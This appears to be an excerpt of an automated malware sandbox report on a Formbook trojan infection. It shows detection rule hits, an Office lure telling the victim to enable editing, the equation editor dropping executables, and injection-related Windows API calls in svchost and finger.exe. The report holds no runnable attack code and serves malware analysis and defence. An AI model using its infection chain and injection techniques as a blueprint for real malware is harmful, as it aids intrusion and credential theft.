Source: 0000000E.00000002.457614450.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.841509438.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.841357530.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.841245837.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.383628126.0000000001F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.841406060.0000000003C70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.841337285.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4

Screenshot OCR: Enable editing from the yellow bar above.The independent auditors' opinion says the financial state

Binary is likely a compiled AutoIt script file

Source: fredchungel99962.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: fredchungel99962.exe, 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_69ac8080-5
Source: fredchungel99962.exe, 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_2f234deb-e
Source: fredchungel99962.exe.2.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_bd3ad7bc-f
Source: fredchungel99962.exe.2.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_0f586d13-2
Source: BE[1].exe.2.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_c4161d5a-c
Source: BE[1].exe.2.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_3a276f60-7

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\BE[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\fredchungel99962.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040B073 NtMapViewOfSection,	6_2_0040B073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040A823 NtSetContextThread,	6_2_0040A823
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040B943 NtDelayExecution,	6_2_0040B943
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040AA33 NtResumeThread,	6_2_0040AA33
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040B2A3 NtCreateFile,	6_2_0040B2A3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040A403 NtSuspendThread,	6_2_0040A403
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040B4D3 NtReadFile,	6_2_0040B4D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040BD63 NtAllocateVirtualMemory,	6_2_0040BD63
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040AE53 NtCreateSection,	6_2_0040AE53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0042BF53 NtClose,	6_2_0042BF53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008807AC NtCreateMutant,LdrInitializeThunk,	6_2_008807AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087F9F0 NtClose,LdrInitializeThunk,	6_2_0087F9F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087FAE8 NtQueryInformationProcess,LdrInitializeThunk,	6_2_0087FAE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087FB68 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_0087FB68
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087FDC0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_0087FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008800C4 NtCreateFile,	6_2_008800C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00880048 NtProtectVirtualMemory,	6_2_00880048
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00880060 NtQuerySection,	6_2_00880060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00880078 NtResumeThread,	6_2_00880078
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008801D4 NtSetValueKey,	6_2_008801D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0088010C NtOpenDirectoryObject,	6_2_0088010C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00880C40 NtGetContextThread,	6_2_00880C40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008810D0 NtOpenProcessToken,	6_2_008810D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00881148 NtOpenThread,	6_2_00881148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087F8CC NtWaitForSingleObject,	6_2_0087F8CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087F900 NtReadFile,	6_2_0087F900
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00881930 NtSetContextThread,	6_2_00881930
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087F938 NtWriteFile,	6_2_0087F938
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087FAB8 NtQueryValueKey,	6_2_0087FAB8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087FAD0 NtAllocateVirtualMemory,	6_2_0087FAD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087FA20 NtQueryInformationFile,	6_2_0087FA20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087FA50 NtEnumerateValueKey,	6_2_0087FA50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087FBB8 NtQueryInformationToken,	6_2_0087FBB8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087FBE8 NtQueryVirtualMemory,	6_2_0087FBE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087FB50 NtCreateKey,	6_2_0087FB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087FC90 NtUnmapViewOfSection,	6_2_0087FC90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087FC30 NtOpenProcess,	6_2_0087FC30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087FC48 NtSetInformationFile,	6_2_0087FC48
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087FC60 NtMapViewOfSection,	6_2_0087FC60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00881D80 NtSuspendThread,	6_2_00881D80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087FD8C NtDelayExecution,	6_2_0087FD8C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087FD5C NtEnumerateKey,	6_2_0087FD5C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087FEA0 NtReadVirtualMemory,	6_2_0087FEA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087FED0 NtAdjustPrivilegesToken,	6_2_0087FED0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087FE24 NtWriteVirtualMemory,	6_2_0087FE24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087FFB4 NtCreateSection,	6_2_0087FFB4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087FFFC NtCreateProcessEx,	6_2_0087FFFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0087FF34 NtQueueApcThread,	6_2_0087FF34

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_0131D5EB: CreateFileW,DeviceIoControl,CloseHandle,

5_2_0131D5EB

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_01311201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

5_2_01311201

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_0131E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

5_2_0131E8F6

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012B8060	5_2_012B8060
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_01322046	5_2_01322046
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_01318298	5_2_01318298
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012EE4FF	5_2_012EE4FF
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012E676B	5_2_012E676B
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_01344873	5_2_01344873
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012DCAA0	5_2_012DCAA0
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012BCAF0	5_2_012BCAF0
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012E6DD9	5_2_012E6DD9
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012CCC39	5_2_012CCC39
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012CB119	5_2_012CB119
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012B91C0	5_2_012B91C0
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012CD065	5_2_012CD065
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012D1394	5_2_012D1394
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012C120B	5_2_012C120B
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012D1706	5_2_012D1706
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012B7920	5_2_012B7920
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012C997D	5_2_012C997D
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012D19B0	5_2_012D19B0
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012D781B	5_2_012D781B
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012D7A4A	5_2_012D7A4A
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012D1C77	5_2_012D1C77
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012D7CA7	5_2_012D7CA7
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012D1F32	5_2_012D1F32
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_0133BE44	5_2_0133BE44
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012E9EEE	5_2_012E9EEE
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_001D36B0	5_2_001D36B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00403150	6_2_00403150
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_004029A1	6_2_004029A1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_004029B0	6_2_004029B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00401270	6_2_00401270
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_004112DF	6_2_004112DF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_004112E3	6_2_004112E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00417AB3	6_2_00417AB3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0042E333	6_2_0042E333
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040257C	6_2_0040257C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00411503	6_2_00411503
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00402580	6_2_00402580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040F583	6_2_0040F583
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00402750	6_2_00402750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0088E0C6	6_2_0088E0C6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0088E2E9	6_2_0088E2E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_009363BF	6_2_009363BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008B63DB	6_2_008B63DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00892305	6_2_00892305
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008DA37B	6_2_008DA37B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0091443E	6_2_0091443E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_009105E3	6_2_009105E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008AC5F0	6_2_008AC5F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008D6540	6_2_008D6540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00894680	6_2_00894680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0089E6C1	6_2_0089E6C1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00932622	6_2_00932622
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008DA634	6_2_008DA634
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0089C7BC	6_2_0089C7BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0089C85C	6_2_0089C85C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008B286D	6_2_008B286D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0093098E	6_2_0093098E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008929B2	6_2_008929B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_009249F5	6_2_009249F5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008A69FE	6_2_008A69FE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008DC920	6_2_008DC920
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0093CBA4	6_2_0093CBA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00916BCB	6_2_00916BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00932C9C	6_2_00932C9C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0091AC5E	6_2_0091AC5E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008C0D3B	6_2_008C0D3B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0089CD5B	6_2_0089CD5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008C2E2F	6_2_008C2E2F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008AEE4C	6_2_008AEE4C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0092CFB1	6_2_0092CFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00902FDC	6_2_00902FDC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008A0F3F	6_2_008A0F3F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008BD005	6_2_008BD005
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00893040	6_2_00893040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008A905A	6_2_008A905A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0090D06D	6_2_0090D06D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0091D13F	6_2_0091D13F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00931238	6_2_00931238
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0088F3CF	6_2_0088F3CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00897353	6_2_00897353
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008A1489	6_2_008A1489
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008C5485	6_2_008C5485
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008CD47D	6_2_008CD47D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_009335DA	6_2_009335DA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0089351F	6_2_0089351F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0091579A	6_2_0091579A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008C57C3	6_2_008C57C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0092771D	6_2_0092771D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0090F8C4	6_2_0090F8C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0092F8EE	6_2_0092F8EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00915955	6_2_00915955
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0091394B	6_2_0091394B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00943A83	6_2_00943A83
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0091DBDA	6_2_0091DBDA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0088FBD7	6_2_0088FBD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008B7B00	6_2_008B7B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0092FDDD	6_2_0092FDDD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0091BF14	6_2_0091BF14
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008BDF7C	6_2_008BDF7C
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Code function: 7_2_03F15AA9	7_2_03F15AA9
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Code function: 7_2_03EF8A59	7_2_03EF8A59
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Code function: 7_2_03EF8A55	7_2_03EF8A55
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Code function: 7_2_03EFF229	7_2_03EFF229
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Code function: 7_2_03EF6CF9	7_2_03EF6CF9
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Code function: 7_2_03EF8C79	7_2_03EF8C79
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E8B660	8_2_61E8B660
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E30198	8_2_61E30198
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E713D6	8_2_61E713D6
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E44295	8_2_61E44295
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E3D24D	8_2_61E3D24D
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E20437	8_2_61E20437
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E3E7F7	8_2_61E3E7F7
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E4177D	8_2_61E4177D
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E2266D	8_2_61E2266D
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E2F9AE	8_2_61E2F9AE
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E159BA	8_2_61E159BA
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E4F8C0	8_2_61E4F8C0
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E50BCA	8_2_61E50BCA
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E24B1D	8_2_61E24B1D
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E52D85	8_2_61E52D85
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E43D29	8_2_61E43D29
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E28EDC	8_2_61E28EDC
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E1BE81	8_2_61E1BE81

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\sqlite3.dll 7705B87603E0D772E1753441001FCF1AC2643EE41BF14A8177DE2C056628665C

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 008D3F92 appears 132 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 008D373B appears 253 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 008FF970 appears 84 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0088E2A8 appears 60 times
